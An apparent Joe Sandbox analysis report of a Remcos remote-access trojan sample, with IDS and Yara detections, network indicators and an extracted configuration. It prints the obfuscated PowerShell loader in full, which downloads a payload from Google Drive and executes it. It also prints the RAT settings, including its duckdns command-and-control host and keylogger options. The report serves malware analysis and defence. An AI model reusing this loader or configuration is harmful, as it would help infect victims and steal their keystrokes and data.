(Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctgl

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T16:53:24.730471+010028033053Unknown Traffic192.168.2.549723172.217.19.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T16:53:56.419547+010028032702Potentially Bad Traffic192.168.2.549799172.217.19.174443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["gnsuw4-nsh6-mnsg.duckdns.org:3613:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8OIXMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49805 version: TLS 1.2
              Source: Binary string: stem.Core.pdb's source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2150718779.000001D40D721000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154799674.000001D40B882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154578700.000001D40B882000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2423263275.00000298B848E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbb source: powershell.exe, 00000002.00000002.2421753181.00000298B8208000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: gnsuw4-nsh6-mnsg.duckdns.org
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49799 -> 172.217.19.174:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 172.217.19.174:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A1DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A1A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2385346725.000002989FC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2526221910.0000000004D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2385346725.000002989FC51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2526221910.0000000004D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A19DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A10AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/k
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYTW
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYTg
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYTll
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYTw
              Source: powershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8jP
              Source: powershell.exe, 00000005.00000002.2526221910.0000000004E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8jXR
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000008.00000003.2654943529.0000000008398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2700386932.000000000836C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A01EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1E4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comseUr
              Source: powershell.exe, 00000002.00000002.2385346725.000002989FE76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A10AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.2385346725.00000298A00CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A1A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A19E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2385346725.00000298A00E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594346623.000000000839D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2594629570.00000000083D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49805 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7364.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7808.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW peri
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periJump to 